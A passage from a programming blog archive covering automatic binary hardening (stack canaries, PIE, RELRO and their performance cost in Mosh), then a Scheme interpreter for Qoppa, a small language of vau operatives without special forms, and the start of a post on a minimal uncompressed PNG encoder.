yes<br />checking whether the linker accepts -Wl,-z,now... yes<br />...<br />+ make<br />...<br /><span class="Prompt">$</span> <span class="Entry">~/checksec.sh --file src/test</span><br /><span style="color:green">Full RELRO</span> <span style="color:green">Canary found</span> <span style="color:green">NX enabled</span> <span style="color:green">PIE enabled</span><br /></code></pre> <p>We can dig deeper on some of these. <code>objdump -d</code> shows that the unhardened executable puts <code>main</code> at a fixed address, say <code>0x4006e0</code>, while the position-independent executable specifies a small offset like <code>0x9e0</code>. We can also see the stack-canary checks:</p><pre><code>b80: sub $0x18,%rsp<br />b84: mov %fs:0x28,%rax<br />b8d: mov %rax,0x8(%rsp)<br /><br /> ... function body ...<br /><br />b94: mov 0x8(%rsp),%rax<br />b99: xor %fs:0x28,%rax<br />ba2: jne bb4 &lt;c_fun+0x34&gt;<br /><br /> ... normal epilogue ...<br /><br />bb4: callq 9c0 &lt;__stack_chk_fail@plt&gt;</code></pre><p>The function starts by copying a &quot;<a href="http://en.wikipedia.org/wiki/Animal_sentinels#Detection_of_toxic_gases">canary</a>&quot; value from <code>%fs:0x28</code> to the stack. On return, that value had better still be there; otherwise, an attacker has clobbered our stack frame.</p><p>The canary is chosen randomly by glibc at program start. The <code>%fs</code> <a href="http://en.wikipedia.org/wiki/X86_memory_segmentation">segment</a> has a random offset in linear memory, which makes it hard for an attacker to discover the canary through an information leak. This also puts it within thread-local storage, so glibc could use a different canary value for each thread (but I'm not sure if it does).</p><p>The hardening flags adapt to any other compiler options we specify. 
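As a toy illustration of the canary check described above (my sketch, not glibc's actual mechanism), here is the same idea in a few lines of Python: a "frame" is a fixed-size buffer with a random canary placed after it, and an unbounded copy that runs past the buffer is detected when the canary is re-checked.

```python
# Toy model of a stack canary (illustration only, not glibc's real
# mechanism): a "frame" is a buffer followed by a random canary; an
# unbounded copy that overruns the buffer clobbers the canary.
import os

def call_with_canary(payload: bytes, bufsize: int = 8) -> str:
    canary = os.urandom(8)
    frame = bytearray(bufsize) + bytearray(canary)
    # Like an unchecked strcpy: writes len(payload) bytes from offset 0,
    # with no regard for the buffer size.
    frame[:len(payload)] = payload
    # The check on "return": is the canary still intact?
    if bytes(frame[bufsize:bufsize + 8]) != canary:
        return "*** stack smashing detected ***"
    return "ok"

print(call_with_canary(b"hi"))       # fits within the buffer
print(call_with_canary(b"A" * 12))   # overruns into the canary
```

The real protection is, of course, done by the compiler-inserted prologue and epilogue shown in the disassembly, with the canary held in thread-local storage rather than adjacent memory.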
For example, let's try a static build:</p><pre class="sourceCode"><code class="sourceCode"><span class="Prompt">$</span> <span class="Entry">./build.sh LDFLAGS=-static</span><br />+ autoreconf -fi<br />+ ./configure LDFLAGS=-static<br />...<br />checking whether C compiler accepts -fPIE... yes<br />checking whether C++ compiler accepts -fPIE... yes<br />checking whether the linker accepts -fPIE -pie... no<br />...<br />+ make<br />...<br /><span class="Prompt">$</span> <span class="Entry">file src/test</span><br />src/test: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux),<br />statically linked, for GNU/Linux 2.6.26, not stripped<br /><span class="Prompt">$</span> <span class="Entry">~/checksec.sh --file src/test</span><br /><span style="color:goldenrod">Partial RELRO</span> <span style="color:green">Canary found</span> <span style="color:green">NX enabled</span> <span style="color:red">No PIE</span><br /></code></pre> <p>We can't have position independence with static linking. And <code>checksec.sh</code> thinks we aren't RELRO-protecting the PLT — but that's because we don't have one.</p><h1 id="performance">Performance</h1><p>So what's the catch? These protections can slow down your program significantly. I ran <a href="https://github.com/keithw/mosh/issues/79#issuecomment-4683789">a few benchmarks</a> for Mosh, on three test machines:</p><ul class="incremental"><li><p>A wimpy netbook: 1.6 GHz Atom N270, Ubuntu 12.04 <code>i386</code></p></li><li><p>A reasonable laptop: 2.1 GHz Core 2 Duo T8100, Debian sid <code>amd64</code></p></li><li><p>A beefy desktop: 3.0 GHz Phenom II X6 1075T, Debian sid <code>amd64</code></p></li></ul><p>In all three cases I built Mosh using GCC 4.6.3. 
Here's the relative slowdown, in percent.</p><table class="datatable"><tr><th>Protections </th><th>Netbook </th><th>Laptop </th><th>Desktop </th></tr><tr><td>Everything </td><td>16.0 </td><td>4.4 </td><td>2.1 </td></tr><tr><td>All except PIE </td><td>4.7 </td><td>3.3 </td><td>2.2 </td></tr><tr><td>All except stack protector </td><td>11.0 </td><td>1.0 </td><td>1.1 </td></tr></table> <p>PIE really hurts on <code>i386</code> because data references <a href="http://eli.thegreenplace.net/2011/11/03/position-independent-code-pic-in-shared-libraries/">use an extra register</a>, and registers are scarce to begin with. It's much cheaper on <code>amd64</code> thanks to <a href="http://en.wikipedia.org/wiki/Addressing_mode#PC-relative">PC-relative addressing</a>.</p><p>There are other variables, of course. One Debian stable system with GCC 4.4 saw a 30% slowdown, with most of it coming from the stack protector. So this deserves further scrutiny, if your project is performance-critical. Mosh doesn't use very much CPU anyway, so I decided security is the dominant priority.</p>http://mainisusuallyafunction.blogspot.com/2012/05/automatic-binary-hardening-with.htmlnoreply@blogger.com (keegan)9tag:blogger.com,1999:blog-1563623855220143059.post-7599939586658847281Sat, 28 Apr 2012 07:09:00 +00002012-04-28T00:09:01.051-07:00codelambda-calculuslanguagesqoppaschemevau-calculusScheme without special forms: a metacircular adventure<p>A good programming language will have many libraries building on a small set of core features. Writing and distributing libraries is much easier than dealing with changes to a language implementation. Of course, the choice of core features affects the scope of things we can build as libraries. 
We want a very small core that still allows us to build anything.</p><p>The <a href="http://en.wikipedia.org/wiki/Lambda_calculus">lambda calculus</a> can implement any computable function, and encode <a href="http://en.wikipedia.org/wiki/Church_encoding">arbitrary data types</a>. Technically, it's all we need to instruct a computer. But programs also need to be written and understood by humans. We fleshy meatbags will soon get lost in a sea of unadorned lambdas. Our languages need to have more structure.</p><p>As an example, the <a href="http://schemers.org/">Scheme</a> programming language is explicitly based on the lambda calculus. But it adds syntactic <a href="http://www.gnu.org/software/mit-scheme/documentation/mit-scheme-ref/Special-Forms.html">special forms</a> for definitions, variable binding, conditionals, etc. Scheme also lets the programmer define new syntactic forms as <a href="http://community.schemewiki.org/?scheme-faq-macros">macros</a> translating to existing syntax. Indeed, <code>lambda</code> and the macro system are enough to implement <a href="http://en.wikipedia.org/wiki/Scheme_(programming_language)#Minimalism">some</a> of the standard special forms.</p><p>But we can do better. There's a simple abstraction which lets us define <code>lambda</code>, Lisp or Scheme macros, and all the other special forms as mere library code. This idea was known as &quot;<a href="http://en.wikipedia.org/wiki/Fexpr">fexprs</a>&quot; in old Lisps, and more recently as &quot;operatives&quot; in <a href="http://fexpr.blogspot.com/">John Shutt</a>'s programming language <a href="http://web.cs.wpi.edu/~jshutt/kernel.html">Kernel</a>. Shutt's <a href="http://www.wpi.edu/Pubs/ETD/Available/etd-090110-124904/unrestricted/jshutt.pdf">PhD thesis</a> [PDF] has been a vital resource for learning about this stuff; I'm slowly making my way through its 416 pages.</p><p>What I understand so far can be summarized by something self-contained and kind of cool. 
Here's the agenda:</p><ul class="incremental"><li><p>I'll describe a tiny programming language named Qoppa. Its S-expression syntax and basic data types are borrowed from Scheme. Qoppa has no special forms, and a small set of built-in operatives.</p></li><li><p>We'll write a Qoppa interpreter in Scheme.</p></li><li><p>We'll write a library for Qoppa which implements enough Scheme features to run the Qoppa interpreter.</p></li><li><p>We'll use this nested interpreter to very slowly compute the factorial of 5.</p></li></ul><p>All of the code is <a href="https://github.com/kmcallister/qoppa">on GitHub</a>, if you'd like to see it in one place.</p><h1 id="operatives-in-qoppa">Operatives in Qoppa</h1><p>An operative is a first-class value: it can be passed to and from functions, stored in data structures, and so forth. To use an operative, you apply it to some arguments, much like a function. The difference is that</p><ol class="incremental" style="list-style-type: lower-alpha"><li><p>The operative receives its arguments as unevaluated syntax trees, and</p></li><li><p>The operative also gets an argument representing the variable-binding environment at the call site.</p></li></ol><p>Just as Scheme's functions are constructed by the <code>lambda</code> syntax, Qoppa's operatives are constructed by <code>vau</code>. Here's a simple example:</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define quote<br /> (<span class="kw">vau</span> (x) env<br /> x))</code></pre><p>We bind a single argument as <code>x</code>, and bind the caller's environment as <code>env</code>. (Since we don't use <code>env</code>, we could replace it with <code>_</code>, which means to ignore the argument in that position, like Haskell's <code>_</code> or Kernel's <code>#ignore</code>.) The body of the <code>vau</code> says to return the argument <code>x</code>, unevaluated.</p><p>So this implements Scheme's <code>quote</code> special form. 
If we evaluate the expression <code>(quote x)</code> we'll get the symbol <code>x</code>. As it happens, <code>quote</code> is used sparingly in Qoppa. There is usually a cleaner alternative, as we'll see.</p><p>Here's another operative:</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define list (<span class="kw">vau</span> xs env<br /> (if (<span class="kw">null?</span> xs)<br /> (quote ())<br /> (<span class="kw">cons</span><br /> (<span class="kw">eval</span> env (<span class="kw">car</span> xs))<br /> (<span class="kw">eval</span> env (<span class="kw">cons</span> list (<span class="kw">cdr</span> xs)))))))</code></pre><p>This <code>list</code> operative does the same thing as Scheme's <code>list</code> function: it evaluates any number of arguments and returns them in a list. So <code>(list (+ 2 2) 3)</code> evaluates to the list <code>(4 3)</code>.</p><p>In Scheme, <code>list</code> is just <code>(lambda xs xs)</code>. In Qoppa it's more involved, because we must explicitly evaluate each argument. This is the hallmark of (meta)programming with operatives: we selectively evaluate using <code>eval</code>, rather than selectively suppressing evaluation using <code>quote</code>.</p><p>The last part of this code deserves closer scrutiny:</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(<span class="kw">eval</span> env (<span class="kw">cons</span> list (<span class="kw">cdr</span> xs)))</code></pre><p>What if the caller's environment <code>env</code> contains a local binding for the name <code>list</code>? Not to worry, because we aren't quoting the name <code>list</code>. We're building a cons pair whose car is the <em>value</em> of <code>list</code>... an operative! 
Supposing <code>xs</code> is <code>(1 2 3)</code>, the expression</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(<span class="kw">cons</span> list (<span class="kw">cdr</span> xs))</code></pre><p>evaluates to the list</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(&lt;some-value-representing-an-operative&gt; <span class="dv">2</span> <span class="dv">3</span>)</code></pre><p>and <em>that's</em> what <code>eval</code> sees. Just like <code>lambda</code>, evaluating a <code>vau</code> expression captures the current environment. When the resulting operative is used, the <code>vau</code> body gets values from this captured static environment, not the dynamic argument of the caller. So we have lexical scoping by default, with the option of dynamic scoping thanks to that <code>env</code> parameter.</p><p>Compare this situation with Lisp or Scheme macros. Lisp macros build code which refers to external stuff by name. Maintaining <a href="http://en.wikipedia.org/wiki/Hygienic_macro">macro hygiene</a> requires constant attention by the programmer. Scheme's macros are hygienic by default, but the macro system is far more complex. Rather than writing ordinary functions, we have to use one of several <a href="http://community.schemewiki.org/?syntax-case">special-purpose sublanguages</a>. Operatives provide the safety of Scheme macros, but (like Lisp macros) they use only the core computational features of the language.</p><h1 id="implementing-qoppa">Implementing Qoppa</h1><p>Now that you have a taste of what the language is like, let's write a Qoppa interpreter in Scheme.</p><p>We will represent an environment as a list of frames, where a frame is simply an <a href="http://en.wikipedia.org/wiki/Association_list">association list</a>. 
Within the <code>vau</code> body in</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">( (<span class="kw">vau</span> (x) _ x) <span class="dv">3</span> )</code></pre><p>the current environment would be something like</p><pre><code>( ;; local frame<br /> ((x 3))<br /><br /> ;; global frame<br /> ((cons &lt;operative&gt;)<br /> (car &lt;operative&gt;)<br /> ...) )</code></pre><p>Here's a Scheme function to build a frame from some names and the corresponding values.</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(bind param val) (<span class="kw">cond</span><br /> ((<span class="kw">and</span> (<span class="kw">null?</span> param) (<span class="kw">null?</span> val))<br /> &#39;())<br /> ((<span class="kw">eq?</span> param &#39;_)<br /> &#39;())<br /> ((<span class="kw">symbol?</span> param)<br /> (<span class="kw">list</span> (<span class="kw">list</span> param val)))<br /> ((<span class="kw">and</span> (<span class="kw">pair?</span> param) (<span class="kw">pair?</span> val))<br /> (<span class="kw">append</span><br /> (bind (<span class="kw">car</span> param) (<span class="kw">car</span> val))<br /> (bind (<span class="kw">cdr</span> param) (<span class="kw">cdr</span> val))))<br /> (<span class="kw">else</span><br /> (error <span class="st">&quot;can&#39;t bind&quot;</span> param val))))</code></pre><p>We allow names and values to be arbitrary trees, so for example</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(bind<br /> &#39;((a b) . c)<br /> &#39;((<span class="dv">1</span> <span class="dv">2</span>) <span class="dv">3</span> <span class="dv">4</span>))</code></pre><p>evaluates to</p><pre class="sourceCode scheme"><code class="sourceCode scheme">((a <span class="dv">1</span>)<br /> (b <span class="dv">2</span>)<br /> (c (<span class="dv">3</span> <span class="dv">4</span>)))</code></pre><p>(If you'll recall, <code>(x . 
y)</code> is the pair formed by <code>(cons 'x 'y)</code>, an <a href="http://clhs.lisp.se/Body/26_glo_i.htm#improper_list">improper list</a>.) The generality of <code>bind</code> means our argument-binding syntax — in <code>vau</code>, <code>lambda</code>, <code>let</code>, etc. — will be richer than Scheme's.</p><p>Next, a function to find a <code>(name value)</code> entry, given the name and an environment. This just invokes <a href="http://www.math.grin.edu/~stone/scheme-web/assq.html"><code>assq</code></a> on each frame until we find a match.</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(m-lookup name env)<br /> (<span class="kw">if</span> (<span class="kw">null?</span> env)<br /> (error <span class="st">&quot;could not find&quot;</span> name)<br /> (<span class="kw">let</span> ((binding (<span class="kw">assq</span> name (<span class="kw">car</span> env))))<br /> (<span class="kw">if</span> binding<br /> binding<br /> (m-lookup name (<span class="kw">cdr</span> env))))))</code></pre><p>We also need a representation for operatives. A simple choice is that a Qoppa operative is represented by a Scheme procedure that takes the operands and current environment as arguments. Now we can write the Qoppa evaluator itself.</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(m-eval env exp) (<span class="kw">cond</span><br /> ((<span class="kw">symbol?</span> exp)<br /> (<span class="kw">cadr</span> (m-lookup exp env)))<br /> ((<span class="kw">pair?</span> exp)<br /> (m-operate env (m-eval env (<span class="kw">car</span> exp)) (<span class="kw">cdr</span> exp)))<br /> (<span class="kw">else</span><br /> exp)))<br /><br />(<span class="kw">define</span><span class="fu"> </span>(m-operate env operative operands)<br /> (operative env operands))</code></pre><p>The evaluator has only three cases. 
If <code>exp</code> is a symbol, it refers to a value in the current environment. If it's a cons pair, the car must evaluate to an operative and the cdr holds operands. Anything else evaluates to itself: numbers, strings, Booleans, and Qoppa operatives (represented by Scheme procedures).</p><p>Instead of the traditional <a href="http://icampus.mit.edu/xTutor/public/images/content/5/sicp-cover.jpg">eval and apply</a> we have &quot;eval&quot; and &quot;operate&quot;. Thanks to our uniform representation of operatives, the latter is very simple.</p><h1 id="qoppa-builtins">Qoppa builtins</h1><p>Now we need to populate the global environment with useful built-in operatives. <code>vau</code> is the most significant of these. Here is its corresponding Scheme procedure.</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(m-vau static-env vau-operands)<br /> (<span class="kw">let</span> ((params (<span class="kw">car</span> vau-operands))<br /> (env-param (<span class="kw">cadr</span> vau-operands))<br /> (body (<span class="kw">caddr</span> vau-operands)))<br /><br /> (<span class="kw">lambda</span> (dynamic-env operands)<br /> (m-eval<br /> (<span class="kw">cons</span><br /> (bind<br /> (<span class="kw">cons</span> env-param params)<br /> (<span class="kw">cons</span> dynamic-env operands))<br /> static-env)<br /> body))))</code></pre><p>When applying <code>vau</code>, you provide a parameter tree, a name for the caller's environment, and a body. The result of applying <code>vau</code> is an operative which, when applied, evaluates that body. 
It does so in the environment captured by <code>vau</code>, extended with arguments.</p><p>Here's the global environment:</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(make-global-frame)<br /> (<span class="kw">define</span><span class="fu"> </span>(wrap-primitive fun)<br /> (<span class="kw">lambda</span> (env operands)<br /> (apply fun (map (<span class="kw">lambda</span> (exp) (m-eval env exp)) operands))))<br /> (<span class="kw">list</span><br /> (<span class="kw">list</span> &#39;vau m-vau)<br /> (<span class="kw">list</span> &#39;eval (wrap-primitive m-eval))<br /> (<span class="kw">list</span> &#39;operate (wrap-primitive m-operate))<br /> (<span class="kw">list</span> &#39;lookup (wrap-primitive m-lookup))<br /> (<span class="kw">list</span> &#39;bool (wrap-primitive (<span class="kw">lambda</span> (b t f) (<span class="kw">if</span> b t f))))<br /> (<span class="kw">list</span> &#39;eq? (wrap-primitive <span class="kw">eq?</span>))<br /> <span class="co">; more like these</span><br /> ))<br /><br />(<span class="kw">define</span><span class="fu"> global-env </span>(<span class="kw">list</span> (make-global-frame)))</code></pre><p>Other than <code>vau</code>, each built-in operative evaluates all of its arguments. That's what <code>wrap-primitive</code> accomplishes. We can think of these as functions, whereas <code>vau</code> is something more exotic.</p><p>We expose the interpreter's <code>m-eval</code> and <code>m-operate</code>, which are essential for building new features as library code. 
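The whole core — eval, operate, bind, and the vau builtin — fits together in very little code. Here is my own transcription of that machinery into Python, for intuition only (nested tuples stand in for cons cells, the empty tuple for nil, and Python strings for symbols; it is a sketch, not the post's Scheme interpreter):

```python
# Python model of the Qoppa core. Cons cells are (car, cdr) tuples,
# nil is (), and symbols are Python strings. An environment is a list
# of frames; here a frame is a dict rather than an association list.
def bind(param, val):
    if param == () and val == ():
        return {}
    if param == "_":                 # ignore this position
        return {}
    if isinstance(param, str):       # a symbol binds the whole value
        return {param: val}
    if isinstance(param, tuple) and isinstance(val, tuple) and param and val:
        frame = bind(param[0], val[0])
        frame.update(bind(param[1], val[1]))
        return frame
    raise ValueError("can't bind %r to %r" % (param, val))

def lookup(name, env):
    for frame in env:
        if name in frame:
            return frame[name]
    raise KeyError("could not find %s" % name)

def m_eval(env, exp):
    if isinstance(exp, str):                  # symbol: look it up
        return lookup(exp, env)
    if isinstance(exp, tuple) and exp != ():  # pair: apply an operative
        return m_operate(env, m_eval(env, exp[0]), exp[1])
    return exp                                # anything else self-evaluates

def m_operate(env, operative, operands):
    return operative(env, operands)

def m_vau(static_env, operands):
    # operands is the cons list (params env-param body)
    params = operands[0]
    env_param = operands[1][0]
    body = operands[1][1][0]
    def operative(dynamic_env, args):
        frame = bind((env_param, params), (dynamic_env, args))
        return m_eval([frame] + static_env, body)
    return operative

global_env = [{"vau": m_vau}]

# quote as library code: (vau (x) _ x) returns its argument unevaluated.
quote = m_eval(global_env, ("vau", (("x", ()), ("_", ("x", ())))))
print(m_operate(global_env, quote, ("hello", ())))
```

Note that quote falls out as ordinary library code, exactly as in the Qoppa prelude: the symbol hello is returned without ever being looked up in the environment.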
We could implement <code>lookup</code> as library code; providing it here just prevents some code duplication.</p><p>The other functions inherited from Scheme are:</p><ul class="incremental"><li><p>Type predicates: <code>null?</code> <code>symbol?</code> <code>pair?</code></p></li><li><p>Pairs: <code>cons</code> <code>car</code> <code>cdr</code> <code>set-car!</code> <code>set-cdr!</code></p></li><li><p>Arithmetic: <code>+</code> <code>*</code> <code>-</code> <code>/</code> <code>&lt;=</code> <code>=</code></p></li><li><p>I/O: <code>error</code> <code>display</code> <code>open-input-file</code> <code>read</code> <code>eof-object</code></p></li></ul><h1 id="scheme-as-a-qoppa-library">Scheme as a Qoppa library</h1><p>The Qoppa interpreter uses Scheme syntax like <code>lambda</code>, <code>define</code>, <code>let</code>, <code>if</code>, etc. Qoppa itself supports none of this; all we get is <code>vau</code> and some basic data types. But this is enough to build a Qoppa library which provides all the Scheme features we used in the interpreter. This code starts out very cryptic, and becomes easier to read as we have more high-level features available. You can read through <a href="https://github.com/kmcallister/qoppa/blob/master/prelude.qop">the full library</a> if you like. This section will go over some of the more interesting parts.</p><p>Our first task is a bit of a puzzle: how do you define <code>define</code>? It's only possible because we expose the interpreter's representation of environments. 
We can push a new binding onto the top frame of <code>env</code>, like so:</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(<span class="kw">set-car!</span> env<br /> (<span class="kw">cons</span><br /> (<span class="kw">cons</span> &lt;name&gt; (<span class="kw">cons</span> &lt;value&gt; null))<br /> (<span class="kw">car</span> env)))</code></pre><p>We use this idea twice, once inside the <code>vau</code> body for <code>define</code>, and once to define <code>define</code> itself.</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">((<span class="kw">vau</span> (name-of-define null) env<br /> (<span class="kw">set-car!</span> env (<span class="kw">cons</span><br /> (<span class="kw">cons</span> name-of-define<br /> (<span class="kw">cons</span> (<span class="kw">vau</span> (name exp) defn-env<br /> (<span class="kw">set-car!</span> defn-env (<span class="kw">cons</span><br /> (<span class="kw">cons</span> name (<span class="kw">cons</span> (<span class="kw">eval</span> defn-env exp) null))<br /> (<span class="kw">car</span> defn-env))))<br /> null))<br /> (<span class="kw">car</span> env))))<br /> define ())</code></pre><p>Next we'll define Scheme's <code>if</code>, which evaluates one branch or the other. We do this in terms of the Qoppa builtin <code>bool</code>, which always evaluates both branches.</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define if (<span class="kw">vau</span> (b t f) env<br /> (<span class="kw">eval</span> env<br /> (<span class="kw">bool</span> (<span class="kw">eval</span> env b) t f))))</code></pre><p>We already saw the code for <code>list</code>, which evaluates each of its arguments. Many other operatives have this behavior, so we should abstract out the idea of &quot;evaluate all arguments&quot;. 
The operative <code>wrap</code> takes an operative and returns a transformed version of that operative, which evaluates all of its arguments.</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define wrap (<span class="kw">vau</span> (operative) oper-env<br /> (<span class="kw">vau</span> args args-env<br /> (<span class="kw">operate</span> args-env<br /> (<span class="kw">eval</span> oper-env operative)<br /> (<span class="kw">operate</span> args-env list args)))))</code></pre><p>Now we can implement <code>lambda</code> as an operative that builds a <code>vau</code> term, <code>eval</code>s it, and then <code>wraps</code> the resulting operative.</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define lambda (<span class="kw">vau</span> (params body) static-env<br /> (wrap<br /> (<span class="kw">eval</span> static-env<br /> (list <span class="kw">vau</span> params &#39;_ body)))))</code></pre><p>This works just like Scheme's <code>lambda</code>:</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define fact (lambda (n)<br /> (if (<span class="kw">&lt;=</span> n <span class="dv">1</span>)<br /> <span class="dv">1</span><br /> (<span class="kw">*</span> n (fact (<span class="kw">-</span> n <span class="dv">1</span>))))))</code></pre><p>Actually, it's incomplete, because Scheme's <code>lambda</code> allows an arbitrary number of expressions in the body. In other words Scheme's</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">lambda</span> (x) a b c)</code></pre><p>is syntactic sugar for</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">lambda</span> (x) (<span class="kw">begin</span> a b c))</code></pre><p><code>begin</code> evaluates its arguments in order left to right, and returns the value of the last one. In Scheme it's a special form, because normal argument evaluation happens in an undefined order. 
By contrast, the Qoppa interpreter implements a left-to-right order, so we'll define <code>begin</code> as a function.</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define last (lambda (xs)<br /> (if (<span class="kw">null?</span> (<span class="kw">cdr</span> xs))<br /> (<span class="kw">car</span> xs)<br /> (last (<span class="kw">cdr</span> xs)))))<br /><br />(define begin (lambda xs (last xs)))</code></pre><p>Now we can mutate the binding for <code>lambda</code> to support multiple expressions.</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define set! (<span class="kw">vau</span> (name exp) env<br /> (<span class="kw">set-cdr!</span><br /> (<span class="kw">lookup</span> name env)<br /> (list (<span class="kw">eval</span> env exp)))))<br /><br />(set! lambda<br /> ((lambda (base-lambda)<br /> (<span class="kw">vau</span> (param . body) env<br /> (<span class="kw">eval</span> env (list base-lambda param (<span class="kw">cons</span> begin body)))))<br /> lambda))</code></pre><p>Note the structure</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">((lambda (base-lambda) ...) lambda)</code></pre><p>which holds on to the original <code>lambda</code> operative, in a private frame. That's right, we're using <code>lambda</code> to save <code>lambda</code> so we can overwrite <code>lambda</code>. We use the same approach when defining other sugar, such as the implicit <code>lambda</code> in <code>define</code>.</p><p>There are some more bits of Scheme we need to implement: <code>cond</code>, <code>let</code>, <code>map</code>, <code>append</code>, and so forth. These are mostly straightforward; read the code if you want the full story. By far the most troublesome was Scheme's <code>apply</code> function, which takes a function and a list of arguments, and is supposed to apply the function to those arguments. 
The problem is that our functions are really operatives, and expect to call <code>eval</code> on each of their arguments. If we already have the values in a list, how do we pass them on?</p><p>Qoppa and Kernel have very different solutions to this problem. In Kernel, &quot;applicatives&quot; (things that evaluate all their arguments) are a distinct type from operatives. <code>wrap</code> is the primitive constructor of applicatives, and its inverse <code>unwrap</code> is used to implement <code>apply</code>. This design choice simplifies <code>apply</code> but complicates the core evaluator, which needs to distinguish applicatives from operatives.</p><p>For Qoppa I implemented <code>wrap</code> as a library function, which we saw before. But then we don't have <code>unwrap</code>. So <code>apply</code> takes the uglier approach of quoting each argument to prevent double-evaluation.</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define apply (wrap (<span class="kw">vau</span> (operative args) env<br /> (<span class="kw">eval</span> env (<span class="kw">cons</span><br /> operative<br /> (map (lambda (x) (list quote x)) args))))))</code></pre><p>In either Kernel or Qoppa, you're not allowed to apply <code>apply</code> to something that doesn't evaluate all of its arguments.</p><h1 id="testing">Testing</h1><p>The code we saw above is split into two files:</p><ul class="incremental"><li><p><a href="https://github.com/kmcallister/qoppa/blob/master/qoppa.scm"><code>qoppa.scm</code></a> is the Qoppa interpreter, written in Scheme</p></li><li><p><a href="https://github.com/kmcallister/qoppa/blob/master/prelude.qop"><code>prelude.qop</code></a> is the Qoppa code which defines <code>wrap</code>, <code>lambda</code>, etc.</p></li></ul><p>I defined a procedure <code>execute-file</code> which reads a file from disk and runs each expression through <code>m-eval</code>. 
The last line of <code>qoppa.scm</code> is</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(execute-file <span class="st">&quot;prelude.qop&quot;</span>)</code></pre><p>so the definitions in <code>prelude.qop</code> are available immediately.</p><p>We start by loading <code>qoppa.scm</code> into a Scheme interpreter. I'm using <a href="http://www.gnu.org/software/guile/">Guile</a> here, but I've actually tested this with a variety of <a href="http://www.schemers.org/Documents/Standards/R5RS/">R5RS</a> implementations.</p><pre><code><span class="Prompt">$</span> <span class="Entry">guile -l qoppa.scm</span><br /><span class="Prompt">guile&gt;</span> <span class="Entry">(m-eval global-env &#39;(fact 5))</span><br />$1 = 120</code></pre><p>This establishes that we've implemented the features used by <code>fact</code>, such as <code>define</code> and <code>lambda</code>. But did we actually implement enough to run the Qoppa interpreter? To test this, we need to go deeper.</p><pre><code><span class="Prompt">guile&gt;</span> <span class="Entry">(execute-file &quot;qoppa.scm&quot;)</span><br />$2 = done<br /><span class="Prompt">guile&gt;</span> <span class="Entry">(m-eval global-env &#39;(m-eval global-env &#39;(fact 5)))</span><br />$3 = 120</code></pre><p>This is factorial implemented in Scheme, implemented as a library for Qoppa, implemented in Scheme, implemented as a library for Qoppa, implemented in Scheme (implemented in C). Of course it's outrageously slow; on my machine this <code>(fact 5)</code> takes about 5 minutes. But it demonstrates that a tiny language of operatives, augmented with an appropriate library, can provide enough syntactic features to run a non-trivial Scheme program. 
As for how to do this <em>efficiently</em>, well, I haven't got far enough into the literature to have any idea.</p><p><em><a href="http://mainisusuallyafunction.blogspot.com/2012/04/scheme-without-special-forms.html">Permalink</a> | posted by keegan | 5 comments</em></p><h1>A minimal encoder for uncompressed PNGs</h1><p><em>Thu, 05 Apr 2012 | tags: code, png, python</em></p><p>I've often wondered how hard it is to output a <a href="http://en.wikipedia.org/wiki/Portable_Network_Graphics">PNG</a> file directly, without using a library or a standard tool like <a href="http://netpbm.sourceforge.net/"><code>pnmtopng</code></a>. (I'm not sure when you'd actually want to do this; maybe for a tiny embedded system with a web interface.)</p><p>I found that constructing a simple, uncompressed PNG does not require a whole lot of code, but there are some odd details I got wrong on the first try. Here's a crash course in writing a minimal PNG encoder. We'll use only a small subset of <a href="http://www.w3.org/TR/PNG/">the PNG specification</a>, but I'll link to the full spec so you can read more.</p><p>The example code is not too fast; it's written in Python and has tons of string copying everywhere. My goal was to express the idea clearly, and let you worry about coding it up in C for your embedded system or whatever. If you're careful, you can avoid ever copying the image data.</p><p>We will assume the raw image data is a Python byte string (non-Unicode), consisting of one byte each for red, green, and blue, for each pixel in English reading order. 
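To make that layout concrete, here is a tiny hand-built image (my addition, not the post's code; I'm using Python 3 <code>bytes</code>, whereas the post's code uses Python 2 byte strings):

```python
# A 2x2 image: red and green on the top row, blue and white on the bottom.
# Three bytes (R, G, B) per pixel, rows listed top to bottom, left to right.
width, height = 2, 2
data = bytes([255, 0, 0,     0, 255, 0,       # top row:    red, green
              0, 0, 255,     255, 255, 255])  # bottom row: blue, white
assert len(data) == 3 * width * height
```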
